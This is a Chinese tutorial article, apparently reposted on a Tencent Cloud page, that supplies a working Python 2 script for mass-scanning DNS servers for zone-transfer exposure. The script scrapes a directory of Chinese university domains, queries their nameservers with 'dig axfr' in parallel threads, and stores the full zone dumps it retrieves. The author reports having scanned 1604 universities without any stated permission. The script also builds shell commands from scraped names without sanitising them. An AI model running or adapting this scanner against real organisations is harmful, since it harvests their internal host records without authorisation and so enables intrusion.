文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布

DNS域传送漏洞

3 篇文章
1
DNS域传送漏洞(二)
2
DNS域传送漏洞(三)
3
DNS域传送漏洞(一)
清单首页DNS域传送漏洞文章详情
清单「DNS域传送漏洞02/03

DNS域传送漏洞(三)

HACK学习

本篇介绍批量扫描存在DNS域传送漏洞的DNS服务器。

然后选择了安全性比较差的教育网,共扫描1604所高校,发现漏洞主机396台。

高校的域名可从该页面抓取到:http://ziyuan.eol.cn/college.php?listid=128

#encoding=gbk

import urllib2

import re

import threading

import os

html_doc = urllib2.urlopen('http://ziyuan.eol.cn/college.php?listid=128').read().decode('utf-8')

links = re.findall('href="(list.php\?listid=\d+)', html_doc) # 地区链接

colleges = []

for link in links:

html_doc = urllib2.urlopen(u'http://ziyuan.eol.cn/' + link).read().decode('utf-8')

urls = re.findall('www\.\w+\.edu.\w+', html_doc)

for url in urls:

colleges.append(url)

print '已采集学校主页 %d 个...' % len(colleges)

# 导出学校主页

with open('colleges.txt', 'w') as outFile:

for college in colleges:

outFile.write(college + '\n')

lock = threading.Lock()

c_index = 0

def test_DNS_Servers():

global c_index

while True:

lock.acquire()

if c_index >= len(colleges):

lock.release()

break # End of list

domain = colleges[c_index].lstrip('www.')

c_index += 1

lock.release()

cmd_res = os.popen('nslookup -type=ns ' + domain).read() # fetch DNS Server List

dns_servers = re.findall('nameserver = ([\w\.]+)', cmd_res)

for server in dns_servers:

if len(server) < 5: server += domain

cmd_res = os.popen(os.getcwd() + '\\BIND9\\dig @%s axfr %s' % (server, domain)).read()

if cmd_res.find('Transfer failed.') < 0 and \

cmd_res.find('connection timed out') < 0 and \

cmd_res.find('XFR size') > 0 :

lock.acquire()

print '*' * 10 + ' Vulnerable dns server found:', server, '*' * 10

lock.release()

with open('vulnerable_hosts.txt', 'a') as f:

f.write('%s %s\n' % (server.ljust(30), domain))

with open('dns\\' + server + '.txt', 'w') as f:

f.write(cmd_res)

threads = []

for i in range(10):

t = threading.Thread(target=test_DNS_Servers)

t.start()

threads.append(t)

for t in threads:

t.join()

print 'All Done!'

请读者注意几个细节:

1) 笔者将windows下的命令行工具dig放在了子目录BIND9下,BIND可前往http://www.isc.org/下载。如果你使用Linux,可把完整路径删除。

2) Os.popen打开一个子程序,并返回它的执行结果。

3) Dig命令执行结果中出现特征字符串“XFR size”,则表明该DNS服务器存在漏洞。

下一篇
举报

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287

领券